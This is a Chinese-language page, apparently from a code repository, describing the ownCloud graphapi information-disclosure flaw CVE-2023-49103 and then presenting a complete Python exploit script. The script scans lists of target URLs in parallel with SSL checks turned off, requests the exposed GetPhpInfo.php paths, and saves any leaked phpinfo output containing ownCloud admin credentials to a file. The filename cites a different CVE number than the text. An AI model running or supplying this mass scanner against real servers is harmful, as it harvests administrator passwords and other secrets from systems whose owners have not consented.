OwnCloud 敏感信息泄漏漏洞CVE-2023-49103

OwnCloud 是一个免费开源的文件共享和协作平台，可让您在自己的控制下创建个人或公司云。OwnCloud 跨平台支持 Windows、Mac、Android、iOS、Linux 等平台，而且还提供了「网页版」以及 WebDAV 形式访问，因此你几乎可以在任何电脑、手机设备上都能轻松获取和访问你的文件文档，从而实现跨平台跨设备文件同步、共享、版本控制、团队协作等功能。
ownCloud owncloud/graphapi 0.2.x在0.2.1之前和0.3.x在0.3.1之前存在漏洞。graphapi应用程序依赖于提供URL的第三方GetPhpInfo.php库。当访问此URL时，会显示PHP环境的配置详细信息（phpinfo）。此信息包括Web服务器的所有环境变量，包括敏感数据，如ownCloud管理员密码、邮件服务器凭据和许可证密钥。@Date：2023-11-28

Author: VulnExpo

OwnCloud_CVE-2023-49105_Exploit.py

@@ -0,0 +1,81 @@
+# 作者: VulnExpo
+# 日期: 2023-12-05
+import requests
+import argparse
+import threading
+requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
+
+def check_phpinfo(url, success_file=None):
+	try:
+		response = requests.get(url, verify=False)  # Bypass SSL verification
+		if response.status_code == 200 and 'OWNCLOUD_ADMIN_' in response.text:
+			return response.text
+	except Exception as e:
+		pass
+	return False
+
+def check_for_vulnerability(url, proxies=None, success_file=None):
+	try:
+		url_variant1 = url + "/owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/.css"
+		url_variant2 = url + "/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/.css"
+
+		response_text = check_phpinfo(url_variant1) or check_phpinfo(url_variant2)
+		if response_text:
+			print(f"目标URL: {url} ")
+			with open(success_file, 'a') as s_file:
+				s_file.write(f"++++++++++++++++++\n")
+				s_file.write(f"目标URL: {url}\n")
+				s_file.write(f"响应内容: {response_text}\n\n")
+			return True
+		else:
+			return False
+	except Exception as e:
+		print(f"发生异常：{e}")
+		return False
+
+def scan_targets(targets, proxies=None, success_file=None):
+	for target in targets:
+		target = target.strip()
+		check_for_vulnerability(target, proxies, success_file)
+
+def multi_threaded_scan(urls, proxies=None, success_file=None, num_threads=4):
+	threads = []
+
+	for i in range(num_threads):
+		thread = threading.Thread(target=scan_targets, args=(urls[i::num_threads], proxies, success_file))
+		threads.append(thread)
+
+	for thread in threads:
+		thread.start()
+
+	for thread in threads:
+		thread.join()
+
+if __name__ == '__main__':
+	parser = argparse.ArgumentParser(description="OwnCloud 敏感信息泄漏漏洞CVE-2023-49103")
+	parser.add_argument("-u", "--url", help="目标URL")
+	parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表，默认为url.txt")
+	parser.add_argument("-t", "--threads", type=int, default=4, help="线程数，默认为4")
+	parser.add_argument("-p", "--proxy", help="代理服务器地址（例如：http://localhost:8080）")
+	args = parser.parse_args()
+
+	if not args.url and not args.file:
+		print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。")
+		exit(1)
+
+	if args.url:
+		urls = [args.url]
+	elif args.file:
+		with open(args.file, 'r') as file:
+			urls = file.readlines()
+
+	success_file = 'success_targets.txt'
+
+	proxies = {
+		"http": args.proxy,
+		"https": args.proxy
+	} if args.proxy else None
+
+	multi_threaded_scan(urls, proxies, success_file, args.threads)
+
+	print("扫描完成，成功的目标已保存到 success_targets.txt 文件中。")